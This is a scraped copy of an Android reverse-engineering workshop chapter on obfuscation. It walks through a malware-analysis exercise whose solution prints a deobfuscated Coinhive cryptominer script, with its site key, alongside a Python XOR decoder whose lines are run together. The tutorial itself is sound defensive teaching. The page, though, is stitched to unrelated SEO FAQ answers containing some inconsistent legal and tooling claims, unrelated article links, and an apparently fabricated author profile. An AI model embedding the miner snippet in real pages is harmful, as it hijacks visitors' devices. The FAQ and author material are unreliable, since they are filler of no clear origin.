Android App Reverse Engineering 101 (2024)

Table of Contents
How to De-Obfuscate Indicators of Obfuscation Exercise 7 - String Deobfuscation Goals Exercise Context Instructions Solution More Examples FAQs
Android App Reverse Engineering 101 (1)

Learn to reverse engineer Android applications!

View the Project on GitHub maddiestone/AndroidAppRE

Table of Contents

  1. Introduction
  2. Android Application Fundamentals
  3. Getting Started with Reversing Android Apps
    • Exercise 1
  4. Reverse Engineering Android Apps - DEX Bytecode
    • Exercise 2
    • Exercise 3
    • Exercise 4
  5. Reverse Engineering Android Apps - Native Libraries
    • Exercise 5
    • Exercise 6
  6. Reverse Engineering Android Apps - Obfuscation
    • Exercise 7
  7. Conclusion

There are many times when the application you’re reversing will not be as straight forward as some of the examples we’ve discussed. The developer will implement one or more obfuscation techniques to hide the behavior and/or implementation of their app. This can be for both benign and malicious reasons.

The key about obfuscation to remember is that if you want to de-obfuscate it, you will be able to. The key decision is not whether or not you can, but whether or not it’s worth the resources to de-obfuscate.

The reason that you can always de-obfuscate something is because ultimately the CPU at some point has to see the unobfuscated code in order to run it.

See Also
Malware obfuscation, encoding and encryptionObfuscation or Encryption for Document Security?ObfuscationHealthcare Data Masking: Tokenization, HIPAA and More

How to De-Obfuscate

How you choose to de-obfuscate the application will depend on the obfuscation method, but there are a couple of common techniques that usually work well. Here, we will only touch on the static de-obfuscation techniques since this workshop only covers static analysis/reversing. However, do remember that running the application and dynamically analyzing it can be another great way to get around obfuscation.

For obfuscation in the DEX bytecode (Java), one of the easiest ways to statically deobfuscate is to identify the de-obfuscation methods in the application and copy their decompilation into a Java file that you then run on the obfuscated file, strings, code, etc.

Another solution for both Java and Native Code is to transliterate the de-obfuscation algorithm into Python or any other scripting language that you’re most comfortable. I say “transliterate” because it’s important to remember that you don’t always need to *understand* the de-obfuscation algorithm, you just need a way to execute it. I cover this in more detail in the “Unpacking the Packed Unpacker” talk that is linked in the “More Examples” section.

Indicators of Obfuscation

There are many different types of obfuscation and thus, just as many different types of indicators to alert you as the analyst that an application is likely obfuscated, but here are a few examples with proposed static analysis solutions for deobfuscating.

  • No strings: Java and Android are highly dependent on strings so if you don’t see any or only scrambled strings, it’s highly likely the strings are obfuscated.
    • Suggested solution: Look for method calls that take strings as an argument and trace back where that argument is coming from. At some point the string argument will be going through a deobfuscation method before it’s passed to the API that takes the String argument.
  • Scrambled strings: The Java and Android APIs require the plain text strings, not scrambled.
    • Suggested solution: The scrambled strings are all likely passed to the same methods prior to being passed to the APIs. These methods are likely the deobfuscation methods.
  • Binary files in the assets/ directory and DexClassLoader calls in the app: Likely unpacking and loading additional code. (Could also be downloading from a remote location and then loading using DexClassLoader)
    • Suggestion Solution: Identify where the file is read and then follow the path. It is likely deobfuscated quickly after being read.
  • Native libraries - Can’t identify the JNI functions (no funcs named Java_ and no calls to RegisterNatives): In order to execute any native methods, JNI has to be able to pair the function in the native library with the native method declaration in Java and thus one of the two must exist at some point.
    • Suggested Solution: Start at JNI_OnLoad method and look for a de-obfuscation routine that loads additional code.

Exercise 7 - String Deobfuscation

In this exercise, we will practice de-obfuscating strings in order to analyze an application. For the exercise we will use the sample at ~/samples/ClashOfLights.apk in the VM. This sample has the SHA256 digest c403d2dcee37f80b6d51ebada18c409a9eae45416fe84cd0c1ea1d9897eae4e5.

See Also
Semantic Designs: C# Source Code Obfuscator

Goals

To identify obfuscated strings and develop a solution to deobfuscate it.

Exercise Context

You are a malware analyst reviewing this application to determine if it’s malware. You come across an obfuscated Javascript string that is being loaded and need to deobfuscate it to determine whether or not the application is malicious. You can’t run the application dynamically and need to determine what the Javascript is statically.

Instructions

  1. Find the string that you need to de-obfuscate
  2. Identify the routine that de-obfuscates it.
  3. Determine how you want to write a solution to de-obfuscate the string.
  4. Do it :)

Solution


The deobfuscated string is:

<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous('nf24ZwEMmu0m1X6MgcOv48AMsIYErpFE', {threads: 2});miner.start();</script>

The Python script I wrote to de-obfuscate it is:

enc_str = "773032205849207A3831326F1351202E3B306B7D1E5A3B33252B382454173735266C3D3B53163735222D393B475C7A37222D7F38421B6A66643032205849206477303220584920643D2223725C503A3F39636C725F5C237A082C383C7950223F65023F3D5F4039353E3079755F5F666E1134141F5C4C64377A1B671F565A1B2C7F7B101F42700D1F39331717161574213F2B2337505D27606B712C7B0A543D342E317F214558262E636A6A6E1E4A37282233256C"length = len(enc_str)count = 0dec_str = [0] * (length/2)while (count < length): dec_str[count/2] = (int(enc_str[count], 16) << 4) + int(enc_str[count + 1], 16) & 0xFF count += 2print dec_strkey = [75, 67, 81, 82, 49, 57, 84, 90]enc_str = dec_strcount = 0length = len(enc_str)while (count < length): dec_str[count] = chr(enc_str[count] ^ key[count % len(key)]) count += 1print ''.join(dec_str)

More Examples

I have done a few talks on de-obfuscating Android apps that include a variety of obfuscation mechanisms. In these talks, I discuss the advanced obfuscation techniques, my solution to de-obfuscate them, and the considerations and choices I made when deciding how I wanted to deobfuscate.

  • BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” [video]
    • This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code.
  • REcon 2019: “The Path to the Payload: Android Edition” [video]
    • This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior.

NEXT > 7. Conclusion

Android App Reverse Engineering 101 (2024)

FAQs

What is the difference between Jadx and APKtool? â€ș

These tools are used in reverse engineering. Apktool extracts Dalvik bytecode, while Jadx provides Java source code. You can get more information here about android operating system. Open android studio, and create two textView then set their values in onCreate Method.

Read On â€ș
Can Android APK be decompiled? â€ș

You can unzip an APK file, but the ability to read all the binary contents will not be there. Utilizing APKtool, you can run the following command (replacing the binary name if it differs for you). Once you have decompiled the Android APK file, a folder with the same name will be created.

Discover More Details â€ș
What is the best APK decompiler? â€ș

Jadx. Jadx offers a user-friendly interface for decompiling Java code from Android applications. It's recommended for its ease of use across different platforms.

Continue Reading â€ș
How are Android applications typically protected against reverse engineering? â€ș

Preventing reverse engineering of mobile applications involves using code obfuscation techniques, such as renaming variables and functions, encrypting critical code segments, and employing anti-debugging measures.

See Details â€ș
Should I use APK or AAB? â€ș

In conclusion, both APK and AAB formats have their unique advantages and use cases. APKs offer straightforward packaging and broader distribution options outside Google Play. In contrast, AABs cater to a more efficient, modular, and optimized delivery, especially beneficial for apps distributed through Google Play.

Find Out More â€ș
What is replacing APK? â€ș

An app bundle, on the other hand, is a new format introduced by Google in 2018 as a replacement for the APK. It allows developers to package their apps in a more efficient way by including different versions of the app for different device configurations in one single file.

Tell Me More â€ș
Is it illegal to decompile an APK? â€ș

You can decompile it but you can't use the code. Decompiling is both illegal and wrong, unless it's your own work. You can learn what you need on Google, or find open-source stuff using it and learn from that. It's illegal to decompile ANYTHING without permission.

Show Me More â€ș
Is it legal to decompile APK? â€ș

🔒 Protect your Android app code

In security, there is no perfect protection. The goal of this article is to provide you with some tools and tips to protect your app. Please note that decompiling an app to copy is not legal.

Explore More â€ș
Can I decode an APK file? â€ș

Below are the steps to decompile the APK file that is getting the source files from Android Application Package. Android studio packs the files into the . dex extension and combining that . dex files generate the APK files.

Continue Reading â€ș
What is the command to decompile the APK using Apktool? â€ș

For decompiling use the command "d". The "d" stands for decompile. 9. After the app is correctly decompiled, a new folder will be created in the same folder where you placed your app.

Show Me More â€ș

How to decode an APK file using apktool? â€ș

Compile, decompile and sign APK using apktool utility.
  1. Download latest apktool version.
  2. Download the batch file and aapt.exe.
  3. Create a folder anywhere in the PC and put all the apktool. ...
  4. Open command prompt.
  5. Navigate to the folder where you placed apktool. ...
  6. Now, you need to install the file using the " IF " command.
Feb 24, 2021

Read The Full Story â€ș
How do I extract source code from Android app? â€ș

Download and install an APK decompiler tool such as JADX, Apktool, or JADX-GUI on your computer. Open the decompiler tool and select the APK file that you want to decompile. The decompiler tool will then extract the APK file contents, including the source code, and present it to you in a readable format.

See Details â€ș
Are all reverse engineering apps legal? â€ș

Owner's consent: Reverse engineering is usually legal if it is performed on products, systems or software to which the person or company conducting analysis has the legal right to access (purchased it) or the owner's consent.

Get More Info Here â€ș
How do hackers use reverse engineering? â€ș

They will disassemble it, looking for ways to bypass security features or exploit weaknesses. Reverse engineering can also be used to create pirated copies of copyrighted software or hardware. In some cases, hackers may even create new versions of existing products with added features or improved performance.

Continue Reading â€ș
Which tool can be used for reverse engineering applications? â€ș

Some of the most popular and powerful reverse engineering tools are IDA Pro, Ghidra, ImHex, Radare2, Androguard, Java Snoop, CFF Explorer, API Monitor, WinHex, Hiew, x64dbg, Wireshark, Apktool, Fiddler, and Scylla.

View More â€ș
What is the use of Jadx tool? â€ș

JADX is an open-source tool used for decompiling Android applications, with a specific focus on those developed for the Android platform. By utilizing JADX, users can analyze and comprehend the source code structure of an Android application.

View Details â€ș
What is jadx in Android? â€ș

jadx (Dex to Java Decompiler) is a command line and GUI tool ↗ for producing Java source code from Android DEX and APK files - https://github.com/skylot/jadx ↗

See More â€ș
What is Apktool used for? â€ș

Apktool is a tool for reverse engineering third-party, closed, binary, Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step-by-step.

Learn More â€ș
What can Apktool do? â€ș

It enables the step-by-step debugging of Smail code and can decode resources to almost their original form before rebuilding them after certain alterations. Due to the project-like file structure and automation of some tedious operations, such as apk compilation, it also makes working with an app simpler.

Discover More Details â€ș
Top Articles
What is Freight Prepaid in Shipping?
Shipper liability - Where does it end?
Brent Faiyaz - Wasting Time Lyrics
Brent Faiyaz feat. Drake 'Wasting Time' lyrics meaning explained
Latest Posts
All About Haft-Sin: The 7 ‘S’ of Iranian New Year
How Often Should I Use My Credit Card to Keep It Active?
Article information

Author: Mr. See Jast

Last Updated:

Views: 6068

Rating: 4.4 / 5 (75 voted)

Reviews: 82% of readers found this page helpful

Author information

Name: Mr. See Jast

Birthday: 1999-07-30

Address: 8409 Megan Mountain, New Mathew, MT 44997-8193

Phone: +5023589614038

Job: Chief Executive

Hobby: Leather crafting, Flag Football, Candle making, Flying, Poi, Gunsmithing, Swimming

Introduction: My name is Mr. See Jast, I am a open, jolly, gorgeous, courageous, inexpensive, friendly, homely person who loves writing and wants to share my knowledge and understanding with you.